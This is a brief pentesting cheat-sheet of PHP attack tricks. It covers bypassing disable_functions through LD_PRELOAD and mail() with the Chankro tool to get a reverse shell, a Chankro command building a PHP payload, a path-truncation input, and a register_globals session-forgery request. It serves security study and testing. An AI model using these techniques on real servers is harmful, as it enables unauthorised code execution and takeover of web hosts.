Tricks & Others

Code auditing / Looking for vulnerabilities

https://github.com/dustyfresh/PHP-vulnerability-audit-cheatsheet


Bypass PHP disable_functions and open_basedir

# PHP in Linux calls a binary (sendmail) when the mail() function is executed. 
# If we have putenv() allowed, we can set the environment variable "LD_PRELOAD", so we can 
# preload an arbitrary shared object. Our shared object will execute our custom 
# payload (a binary or a bash script) without the PHP restrictions, so we can have a reverse shell, for example.

# Chankro tool is used for that (https://github.com/TarlogicSecurity/Chankro)
python2 chankro.py --arch 64 --input rev.sh --output chan.php --path /var/www/html


MISC

# Path truncation
# PHP max path is 4096 char
# It is possible to bypass checks for one file, for example, by flooding the path before requesting a resource
page=././././././././.......


# There is a BIG difference between “$salt” and ‘$salt’.
# Double quotes → interpreted as a variable
# Simple quotes → interpreted as a string


Register Globals

index.php ?_SESSION[logged]=1